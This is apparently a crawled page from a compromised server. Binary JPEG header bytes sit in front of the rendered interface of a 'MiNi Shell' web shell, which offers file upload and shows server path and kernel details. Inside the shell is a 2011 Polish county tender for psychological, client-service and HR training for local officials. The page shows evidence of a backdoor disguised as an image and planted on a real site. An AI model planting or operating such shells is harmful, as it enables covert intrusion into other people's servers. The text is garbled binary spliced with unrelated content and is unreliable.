JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110517/140577-N-2011.html

<p class="kh_header"><b>Lębork: Zorganizowanie i przeprowadzenie szkoleń psychologicznych</b><br>
<b>Numer ogłoszenia: 140577 - 2011; data zamieszczenia: 17.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Lęborku , ul. Czołgistów 5, 84-300 Lębork, woj. pomorskie, tel. 059 8632810, faks 059 8632850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://powiat-lebork.com/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń psychologicznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Głównym celem projektu jest wzmocnienie potencjału Starostwa Powiatowego w Lęborku, Urzędu Miejskiego w Lęborku, Urzędu Gminy w Nowej Wsi Lęborskiej, Urzędu Gminy w Cewicach oraz podniesienie jakości usług poprzez poprawę obsługi obywatela i podniesienie kwalifikacji zawodowych i osobistych 173 urzędniczek i urzędników w Powiecie Lęborskim.

1. Przedmiot zamówienia 
Przedmiot zamówienia obejmuje Zorganizowanie i przeprowadzenie szkoleń psychologicznych w ramach projektu pn. Kadra Przyszłości współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet V Dobre rządzenie, działanie 5.2 Wzmocnienie potencjału administracji samorządowej, poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej.

Przedmiot zamówienia został podzielony na 3 części:

a) Część I - Zorganizowanie i przeprowadzenie Szkolenia z zakresu Komunikacji - cykl szkoleń podnoszących umiejętności osobiste dla pracowników samorządowych z Powiatu Lęborskiego w ramach projektu pn.  Kadra Przyszłości

b) Część II- Zorganizowanie i przeprowadzenie Szkolenia z zakresu profesjonalnej obsługi i pracy z trudnym klientem dla pracowników samorządowych z Powiatu Lęborskiego w ramach projektu pn. Kadra Przyszłości

c)Część III - Zorganizowanie i przeprowadzenie Szkolenia z zakresu Zarządzania zasobami ludzkimi w jednostkach samorządu terytorialnego dla pracowników samorządowych z Powiatu Lęborskiego w ramach projektu pn. Kadra Przyszłości

dla pracowników Starostwa Powiatowego w Lęborku, Urzędu Miejskiego w Lęborku, Urzędu Gminy w Nowej Wsi Lęborskiej, Urzędu Gminy w Cewicach w ramach projektu pn. Kadra przyszłości współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet V Dobre rządzenia, działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej).

2. Cele szkoleń
Celem szkoleń jest przekazanie wiedzy i narzędzi do ciągłego udoskonalania wizerunku własnego i urzędu w taki sposób, by pomóc swobodnie komunikować się z innymi, efektywnie pracować w zespole i osiągać założone cele.

3. Adresaci
Oferta adresowana  jest do urzędników wykorzystujących wiedzę z zakresu komunikacji interpersonalnej w pracy zawodowej, zamieszkałych na terenie województwa pomorskiego i zatrudnionych na terenie powiatu lęborskiego w wyżej wymienionych urzędach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.50.00.00-9, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował zespołem osób dyspozycyjnym zarówno w weekendy i w dni powszednie, które będą uczestniczyć w wykonywaniu zamówienia. Zespół musi składać się z co najmniej dwóch osób, w tym:
- psycholog posiadający kwalifikacje niezbędne do wykonywania zawodu, a w szczególności:
- ukończone studia wyższe o kierunku psychologia 
Wszystkie osoby muszą spełnić poniższe wymaganie: 
- posiadają doświadczenie w przeprowadzeniu co najmniej 1 kursu szkolenia warsztatu o tematyce zbliżonej do przedmiotu zamówienia w ostatnich 3 latach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował zespołem osób dyspozycyjnym zarówno w weekendy i w dni powszednie, które będą uczestniczyć w wykonywaniu zamówienia. Zespół musi składać się z co najmniej dwóch osób, w tym:
- psycholog posiadający kwalifikacje niezbędne do wykonywania zawodu, a w szczególności:
- ukończone studia wyższe o kierunku psychologia 
Wszystkie osoby muszą spełnić poniższe wymaganie: 
- posiadają doświadczenie w przeprowadzeniu co najmniej 1 kursu szkolenia warsztatu o tematyce zbliżonej do przedmiotu zamówienia w ostatnich 3 latach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie, że dysponują lub będą dysponować osobą/osobami, które będą uczestniczyć w wykonywaniu zamówienia (załącznik nr 5)

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedstawia wszystkie dokumenty, wypełnione w języku polskim bądź z tłumaczeniem na język polski potwierdzone za zgodność z oryginałem przez wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zdarzeń losowych oraz szczególnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, istnieje możliwość wprowadzenia zmian do zawartej umowy w zakresie:
a)	przesunięcia terminu wykonania przedmiotu zamówienia,
b)	zmiany miejsca odbywania szkoleń, kursów, warsztatów
c)	zmiany osób wskazanych do przeprowadzenia szkoleń, kursów, warsztatów
d)	zmiany harmonogramu zajęć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.leborski.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2011 godzina 13:00, miejsce: w Biurze Obsługi Interesanta w Starostwie Powiatowym w Lęborku, ul. Czołgistów 5, 84-300 Lębork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu pn. Kadra Przyszłości współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet V Dobre rządzenie, działanie 5.2 Wzmocnienie potencjału administracji samorządowej, poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - Zorganizowanie i przeprowadzenie Szkolenia z zakresu Komunikacji - cykl szkoleń podnoszących umiejętności osobiste dla pracowników samorządowych z Powiatu Lęborskiego w ramach projektu pn.  Kadra Przyszłości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KOMUNIKACJA - CYKL SZKOLEŃ PODNOSZĄCYCH UMIEJĘTNOŚCI OSOBISTE
1. Rola stereotypów i rutyny w komunikacji oraz pracy zespołowej w administracji publicznej
a) stereotypy - szansa czy zagrożenie
b) rutyna
c) znaczenie paradygmatu
d) pętla przyczynowości
2. Wprowadzenie do komunikacji interpersonalnej w administracji publicznej
a) rola komunikacji w życiu jednostki i zespołu
b) teoria i zasady komunikacji
c) model komunikacji i filtry
b) bariery komunikacyjne
c) kierunki przepływu informacji
d) narzędzia usprawniające efektywną komunikację
3. Komunikacja jako narzędzie do osiągania celu zespołu w administracji publicznej
a) zasady udzielania informacji zwrotnej
b) płaszczyzny komunikatu: logiczna i emocjonalna, płaszczyzna apelowa, płaszczyzna ujawniania siebie, płaszczyzna rzeczowa i płaszczyzna relacji
c) aktywne słuchanie i style komunikowania się
4. Autoprezentacja jako komunikat 
a) co to jest własny wizerunek i jego rola w życiu zawodowym i publicznym
b) porozumiewanie się
c) tworzenie wizerunku zawodowego
5. Komunikacja niewerbalna - jak czytać mowę ciała 
a) ubiór, kolory, dodatki jako element komunikacji niewerbalnej
b) proksemika, czyli zajmowanie miejsc przy stole
c) zasady interpretacji komunikacji niewerbalnej
d) powitanie i rozmowa
e) język dłoni i rąk
d) gesty wokół twarzy
6. Zasady interpretacji komunikatów niewerbalnych rozmówcy 
a) komunikacja jawna i ukryta
b) kontakt wzrokowy
c) znaczenie poszczególnych zespołów gestów
7. Rola asertywności w efektywnej komunikacji urzędnika
a) czym jest asertywność
b) zachowania nieasertywne i ich następstwa
c) diagnoza własnej asertywności
d) asertywne wyrażanie oczekiwań - komunikacja JA
e) asertywne reagowanie na krytykę
f) asertywna konfrontacja przekonań
8. Asertywne odmawianie i wyznaczanie granic 
a) jak odmawiać współpracownikom, jak powiedzieć NIE przełożonemu
b) jak odmówić nie mówiąc NIE
c) jak sprawić, by cię nie prosili o przysługi - nie musieć odmawiać
9. Zaawansowane metody zwiększania efektywności komunikacji i przekonywania: metaprogramy, metajęzyk,  analiza transakcyjna
10. Jak radzić sobie ze stresem i przeciwdziałać wypaleniu zawodowemu w pracy urzędniczej
a) wpływ stresu na poszczególne aspekty życia,
b) identyfikacja objawów stresu u siebie i innych,
c) metody uwalniania się od stresu - metody relaksacji autogennej, 
d) jak zapobiegać dolegliwościom psychosomatycznym, jak dostarczać organizmowi składników odżywczych i tlenu, niezbędnych do jego codziennej regeneracji,
e) jak poprawić koncentrację uwagi pod wpływem stresu, 
f) wspieranie umiejętności zapamiętywania oraz rozwijania umiejętności twórczego myślenia, pomimo ograniczeń związanych ze stresem, 
g) jak wpływać na poprawę swojego nastroju oraz jak kotwiczyć pozytywne emocje,
11. Jak walczyć ze swoimi słabościami, przygnębieniem

Szkolenie polegać będzie w szczególności na przeprowadzeniu wykładów, ćwiczeniach praktycznych oraz odpowiedziach na pytania uczestników szkolenia na konkretne problemy praktyczne przy stosowaniu przepisów ustawy Prawo ochrony środowiska w administracji samorządowej szczebla gminnego i powiatowego.

5. Liczba uczestników: 10 osób x 4 grupy - łącznie 40 osób

6. Czas trwania szkolenia
Łączna liczba godzin szkoleniowych to 448 godziny, w tym 112 godzin na jedną grupę szkoleniową. Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy. 
Zajęcia będą realizowane w dni robocze dla administracji publicznej w godzinach od 730 do 1530   
w  co najmniej dwutygodniowych odstępach pomiędzy kolejnymi spotkaniami, w systemie - 1 raz 
w tygodniu po 8 godzin-  co do zasady według schematu:
grupa I - poniedziałki, grupa II - wtorki, grupa III - środy, grupa IV - czwartki
 7. Termin wykonania przedmiotu zamówienia
Zamawiający wymaga, aby rozpoczęcie szkolenia nastąpiło w czerwcu 2011 roku, zaś termin ostatecznego zakończenia przypada najpóźniej na grudzień 2011 roku. 
SZCZEGÓŁOWY OPIS  PRZEDMIOTU ZAMÓWIENIA zał nr 7 a.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II- Zorganizowanie i przeprowadzenie Szkolenia z zakresu profesjonalnej obsługi i pracy z trudnym klientem dla pracowników samorządowych z Powiatu Lęborskiego w ramach projektu pn. Kadra Przyszłości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia powinien obejmować m.in.:

1.	Profesjonalna obsługa klienta w urzędzie
a)psychologiczne aspekty obsługi klienta,
c) przedstawienie perspektywy klienta i jego potrzeb,
d) rozpoznawanie potrzeb klienta,
e) budowanie klimatu sprzyjającego efektywnej obsłudze klienta,
f) kierowanie rozmową z klientem - doskonalenie umiejętności efektywnej komunikacji,

2.	Trudni klienci  - jak sobie z nimi radzić
a)  typologia trudnych klientów i ich najczęstsze zachowania.
b)  strategie postępowania - techniki rozmowy z  trudnym klientem.
c) sytuacje konfliktowe w relacji z klientem: przykłady sytuacji konfliktowych, style  rozwiązywania konfliktów. 
d)  aktywne słuchanie, odzwierciedlanie i prowadzenie, parafrazowanie,  
e) wyjaśnianie, zadawanie pytań, komunikaty typu ja, precyzja wypowiedzi, perswazja w mowie.

3.	Reagowanie na zastrzeżenia klientów odwiedzających urzędy
a)  gdy klient ma rację i gdy klient nie ma racji.
b)  techniki reagowania na zastrzeżenia - kompensacja, bumerang, sprostowanie bezpośrednie, sprostowanie pośrednie.
c)  język korzyści, język perswazji.

4.	Asertywność urzędnika w kontakcie z trudnym klientem
a)	co to jest asertywność - próba wspólnego sformułowania definicji. Nieporozumienia związane z pojęciem asertywności i ich przykre konsekwencje. Jak ich uniknąć?
b)	techniki asertywne: zdarta płyta ,zamglenie, asertywne wyznaczanie granic, asertywna odmowa, z treści na  proces.
c)	asertywność w obsłudze trudnego klienta. 
d)	wybrane techniki asertywnego zachowania się i formułowania asertywnych komunikatów: mówienie nie-  asertywna prośba, wyrażanie i przyjmowanie krytyki, obrona własnych granic, reagowanie na zastrzeżenia

5.	Manipulacja a techniki wpływu w kontakcie z  trudnym klientem
a)	metody, które mogą stosować  trudni klienci, by osiągnąć zamierzone rezultaty, czyli psychomanipulacje i jak się przed nimi bronić.
b)	dlaczego ludzie stosują psychomanipulacje
c)	techniki radzenia sobie z osobą zachowującą

6.	Gry i ćwiczenia symulacyjne wpływające na kształtowanie pożądanych postaw i zachowań uczestników

7.	Studium przypadku umożliwiające analizowanie i rozwiązywanie trudnych sytuacji dotyczących specyfiki zawodowej uczestników szkolenia

8.	Warsztaty - scenki związane z określonymi sytuacjami, na co dzień spotykanymi w pracy.

Szkolenie polegać będzie w szczególności na przeprowadzeniu wykładów, ćwiczeniach praktycznych oraz odpowiedziach na pytania uczestników szkolenia na konkretne problemy praktyczne przy stosowaniu przepisów ustawy Prawo ochrony środowiska w administracji samorządowej szczebla gminnego i powiatowego.

5. Liczba uczestników: 12 osób x 2 grupy - łącznie 24 osoby

6. Czas trwania szkolenia
Łączna liczba godzin szkoleniowych to 48 godzin - w tym 24 godziny na jedną grupę szkoleniową.  Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy. 
Zajęcia będą realizowane w dni robocze dla administracji publicznej w godzinach od 730  do 15 30  trzy razy w tygodniu (3 dni). Każdy dzień szkoleniowy trwa 8 godzin. Zajęcia obu grup mają odbywać się w dwóch następujących po sobie tygodniach.

7. Termin wykonania przedmiotu zamówienia
Zamawiający wymaga, aby rozpoczęcie szkolenia nastąpiło w czerwcu 2011 roku, zaś termin ostatecznego zakończenia przypada na lipiec 2011 roku. 
SZCZEGÓŁOWY OPIS  PRZEDMIOTU ZAMÓWIENIA zał nr 7 b.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - Zorganizowanie i przeprowadzenie Szkolenia z zakresu Zarządzania zasobami ludzkimi w jednostkach samorządu terytorialnego dla pracowników samorządowych z Powiatu Lęborskiego w ramach projektu pn. Kadra Przyszłości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia powinien obejmować m.in.:

1. Zagadnienia prawne (ze szczególnym uwzględnieniem prawa pracy); 

2. Zagadnienia nowoczesnego zarządzania w administracji publicznej:
-	zarządzanie strategiczne oraz narzędzia zarządzania, 
-	strategiczne zarządzanie zasobami ludzkimi, 
-	zarządzanie przez cele, 
-	zarządzanie zmianą i nowoczesne koncepcje zarządzania, 
-	zarządzanie wiedzą i organizacyjne uczenie się, 
-	zarządzanie jakością w administracji publicznej,
-	stosunki publiczne - budowanie image-u urzędu i public relations.

3. Zagadnienia zarządzania zasobami ludzkimi:
-	podstawowe elementy pracy działu kadr, 
-	rekrutacja pracowników samorządowych, 
-	systemy szkoleń pracowników - planowanie kariery pracownika,
-	ocenianie pracowników - budowanie i stosowanie arkuszy ocen, przeprowadzenie oceny okresowej, wyznaczenie kompetencji do rozwoju,
-	systemy wynagrodzeń i motywacji.

4. Stosunki międzyludzkie w administracji publicznej:
-	kultura organizacyjna, 
-	komunikowanie się i budowanie zespołów, 
-	rozwiązywanie konfliktów i negocjacje, 
-	patologie stosunków międzyludzkich, 
systemy zarządzania zasobami ludzkimi w praktyce

Szkolenie polegać będzie w szczególności na przeprowadzeniu wykładów, ćwiczeniach praktycznych oraz odpowiedziach na pytania uczestników szkolenia na konkretne problemy praktyczne związane z zarządzaniem zasobami ludzkimi w administracji samorządowej szczebla gminnego i powiatowego.

5. Liczba uczestników: 15 osób x 1 grupa

6. Czas trwania szkolenia
Łączna liczba godzin szkoleniowych to 24 godziny. Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy. 
Zajęcia będą realizowane w dni robocze dla administracji publicznej  w godzinach od 730  do 15 30  przez trzy następujące po sobie dni tygodnia. Każdy dzień szkoleniowy trwa 8 godzin.

7. Termin wykonania przedmiotu zamówienia
Zamawiający wymaga, aby realizacja szkolenia nastąpiła w październiku 2011 r. 
SZCZEGÓŁOWY OPIS  PRZEDMIOTU ZAMÓWIENIA zał nr 7 c.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com